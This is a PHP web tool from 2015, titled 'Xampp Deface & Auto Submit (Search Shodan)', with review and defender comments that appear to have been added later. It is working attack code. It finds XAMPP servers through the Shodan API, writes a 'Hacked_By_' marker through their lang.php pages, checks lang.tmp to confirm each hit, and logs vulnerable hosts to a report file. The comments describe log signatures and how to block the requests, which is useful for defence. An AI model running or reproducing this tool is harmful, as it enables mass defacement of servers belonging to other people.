shor7cut

-_-

Jul 21st, 2015
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title></title>
  5. <link rel="stylesheet" type="text/css" href="https://bootswatch.com/cyborg/bootstrap.css"/>
  6. <link rel="stylesheet" type="text/css" href="https://bootswatch.com/cyborg/bootstrap.min.css"/>
  7. </head>
  8. <body>
  9. <div class="container">
  10.  
  11. <?php
  12. /*
  13. Name : Xampp Deface & Auto Submit (Search Shodan)
  14. Author : Shor7cut
  15. Hai , Kiddies ?
  16. */
      // NOTE(review): single-file web tool. It sends unauthenticated requests to the
      // lang.php pages under /xampp/ and /security/ on a list of hosts and records which
      // hosts echo a marker string back through lang.tmp. The annotations in this file
      // describe that behaviour so it can be recognised in logs and blocked.
      //
      // Runtime setup: all PHP error output is suppressed, the execution time limit is
      // removed and the memory limit is set to 64M, so the page keeps running through
      // long target lists without showing failures.
  17. error_reporting(0);
  18. set_time_limit(0);
  19. ini_set('memory_limit', '64M');
      // Prints the two-entry menu (?cmd=scan, ?cmd=victim) whenever the query string has
      // no non-empty "scan" parameter. "Cari victim" is Indonesian for "search for victim".
  20. if($_GET['scan']==""){?>
  21. <div class="row">
  22. <ul class="breadcrumb">
  23. <li><a href="?cmd=scan">Scan</a></li>
  24. <li><a href="?cmd=victim">Cari victim</a></li>
  25. </ul>
  26. </div>
  27.  
  28. <?php
  29. }
  // cmd=scan: prints the input form, which posts back to this same script
  // (the action is the basename of SCRIPT_FILENAME). Fields:
  //   hacker  - tag appended to the "Hacked_By_" marker in each request (default "Shor7cut")
  //   sites   - the list of targets, as one string
  //   pemisah - Indonesian for "separator"; the string the list is split on (default "|")
  // The "Textarea" label and the help-block text are unchanged Bootstrap sample copy.
  30. if($_GET['cmd']=="scan"){?>
  31. <form class="form-horizontal" action="<?php echo basename($_SERVER["SCRIPT_FILENAME"]);?>" method="post">
  32. <div class="form-group">
  33. <label class="col-lg-2 control-label">Notice </label>
  34. <div class="col-lg-5">
  35. <input type="text" class="form-control" name="hacker" value="Shor7cut" placeholder="Shor7cut">
  36. </div>
  37. </div>
  38.  
  39.  
  40. <div class="form-group">
  41. <label for="textArea" class="col-lg-2 control-label">Textarea</label>
  42. <div class="col-lg-10">
  43. <textarea class="form-control" rows="3" name="sites" id="textArea"></textarea>
  44. <span class="help-block">A longer block of help text that breaks onto a new line and may extend beyond one line.</span>
  45. </div>
  46. </div>
  47.  
  48. <div class="form-group">
  49. <label class="col-lg-2 control-label">Pemisah</label>
  50. <div class="col-lg-1">
  51. <input type="text" class="form-control" name="pemisah" value="|" placeholder="|">
  52. </div>
  53. <input type="submit" class="btn btn-primary" name="scan" value="scan">
  54. </div>
  55.  
  56.  
  57.  
  58. </form>
  59.  
  60. <?php
  61. }
  62. if($_GET['cmd']=="victim"){
      // cmd=victim: asks the Shodan host-search API for hosts whose banner matches
      // "xampp PHP/5.3.8", then prints the number of matches and their IP addresses
      // joined with "|" (the scan form's default separator).
      // NOTE(review): the API key is embedded in the URL; the value shown looks like a
      // placeholder. There is no error handling, so a failed request leaves $json null.
      // NOTE(defender): targets are selected purely by the server banner in a public
      // index, so any XAMPP stack reachable from the internet with this banner can end up
      // in the list. Keeping development stacks off public interfaces removes them from it.
  63. $get = file_get_contents("https://api.shodan.io/shodan/host/search?key=1111111111111111111111111111&query=xampp+PHP/5.3.8");
  64. $json = json_decode($get,true);
  65. echo count($json['matches'])."<br>";
  66. echo '<textarea class="form-control" rows="3" name="sites" id="textArea">';
  67. foreach ($json['matches'] as $key => $value) {
  68. echo $value['ip_str']."|";
  69. }
  70. echo '</textarea>';
  71. }
  72.  
  73.  
  74. if($_POST['scan']){
      // POST handler: reads the submitted list, separator and tag, and splits the list
      // on the separator. Entries are used exactly as typed (no scheme or validation).
  75. $sit = $_POST['sites'];
  76. $pemisah = $_POST['pemisah'];
  77. $hacker = $_POST['hacker'];
  78. $site = explode($pemisah, $sit);
  79. ?>
  80. <div class="panel panel-primary">
  81. <div class="panel-heading">
  82. <h3 class="panel-title">Scan Target</h3>
  83. </div>
  84. <div class="panel-body">
  85.  
  86. <?php
  87. foreach ($site as $key => $sites) {
      // Four URLs per target: lang.php under /xampp/ and /security/ with the marker
      // "Hacked_By_<tag>" as the entire query string, and lang.tmp under the same two
      // directories, which is read back afterwards.
      // NOTE(defender): in a web-server access log this shows up as a GET for
      // /xampp/lang.php or /security/lang.php whose query string is the marker rather
      // than the short language code those pages normally receive, followed by a GET for
      // lang.tmp from the same client. Limiting both directories to local clients in the
      // Apache configuration stops every request made here.
  88. $url1 = "$sites/xampp/lang.php?Hacked_By_$hacker";
  89. $url2 = "$sites/security/lang.php?Hacked_By_$hacker";
  90. $patch_result1 = "$sites/xampp/lang.tmp?";
  91. $patch_result2 = "$sites/security/lang.tmp?";
  92.  
      // All four handles get the same options: HTTP status >= 400 counts as failure,
      // redirects are followed, the body is returned as a string, and the whole transfer
      // is capped at 30 s (CONNECTTIMEOUT 0 selects libcurl's default connect timeout).
      // $result is assigned twice and never read; no handle is closed with curl_close().
  93. // xampp - patch lang.php\\
  94. $xamppcurl = curl_init("$url1");
  95. curl_setopt($xamppcurl, CURLOPT_FAILONERROR, true);
  96. curl_setopt($xamppcurl, CURLOPT_FOLLOWLOCATION, true);
  97. curl_setopt($xamppcurl, CURLOPT_RETURNTRANSFER, true);
  98. curl_setopt($xamppcurl, CURLOPT_CONNECTTIMEOUT ,0);
  99. curl_setopt($xamppcurl, CURLOPT_TIMEOUT, 30);
  100. $result = curl_exec($xamppcurl);
  101.  
  102. $xamppcur2 = curl_init("$url2");
  103. curl_setopt($xamppcur2, CURLOPT_FAILONERROR, true);
  104. curl_setopt($xamppcur2, CURLOPT_FOLLOWLOCATION, true);
  105. curl_setopt($xamppcur2, CURLOPT_RETURNTRANSFER, true);
  106. curl_setopt($xamppcur2, CURLOPT_CONNECTTIMEOUT ,0);
  107. curl_setopt($xamppcur2, CURLOPT_TIMEOUT, 30);
  108. $result = curl_exec($xamppcur2);
  109.  
  110.  
  111.  
       // Read-back step: fetches lang.tmp from each directory; only these two response
       // bodies are inspected below.
  112. // xampp - patch \\
  113. $xampp_tmp = curl_init("$patch_result1");
  114. curl_setopt($xampp_tmp, CURLOPT_FAILONERROR, true);
  115. curl_setopt($xampp_tmp, CURLOPT_FOLLOWLOCATION, true);
  116. curl_setopt($xampp_tmp, CURLOPT_RETURNTRANSFER, true);
  117. curl_setopt($xampp_tmp, CURLOPT_CONNECTTIMEOUT ,0);
  118. curl_setopt($xampp_tmp, CURLOPT_TIMEOUT, 30);
  119. $resultxampp_tmp = curl_exec($xampp_tmp);
  120.  
  121. $xampp_tmp2 = curl_init("$patch_result2");
  122. curl_setopt($xampp_tmp2, CURLOPT_FAILONERROR, true);
  123. curl_setopt($xampp_tmp2, CURLOPT_FOLLOWLOCATION, true);
  124. curl_setopt($xampp_tmp2, CURLOPT_RETURNTRANSFER, true);
  125. curl_setopt($xampp_tmp2, CURLOPT_CONNECTTIMEOUT ,0);
  126. curl_setopt($xampp_tmp2, CURLOPT_TIMEOUT, 30);
  127. $resultxampp_tmp2 = curl_exec($xampp_tmp2);
  128.  
  129.  
  130. ?>
  131.  
  132. <?php
       // Result check: a case-insensitive match for "Hacked_By_" in a lang.tmp body is
       // treated as a hit, i.e. the target's lang.php is taken to have stored the request's
       // query string in lang.tmp. The /security/ copy is only checked when the /xampp/
       // copy did not match. Hits are printed and appended to laporan.txt ("laporan" is
       // Indonesian for "report") next to this script; everything else prints "not vuln".
       // NOTE(defender): a lang.tmp under /xampp/ or /security/ that contains text other
       // than a language code is a sign that this kind of request reached the host.
       // NOTE(review): eregi() was removed in PHP 7, so this file targets PHP 5.x.
  133. if(eregi("Hacked_By_",$resultxampp_tmp))
  134. {
  135. echo $patch_result1."<br>";
  136. $berkas =fopen("laporan.txt","a");
  137. fputs($berkas, $patch_result1."\r\n");
  138. fclose($berkas);
  139. }else if(eregi("Hacked_By_",$resultxampp_tmp2))
  140. {
  141. echo $patch_result2."<br>";
  142. $berkas =fopen("laporan.txt","a");
  143. fputs($berkas, $patch_result2."\r\n");
  144. fclose($berkas);
  145.  
  146. }else {
  147. echo $sites." -> not vuln"."<br>";
  148. }
  149.  
       // Sends the output produced so far to the browser, then waits 2 s before the
       // next target.
  150. flush();
  151. ob_flush();
  152. sleep(2);
  153. }
  154. }
  155. ?>
  156.  
  157. </div>
  158. </div>
  159. </div>
  160. </body>
  161. </html>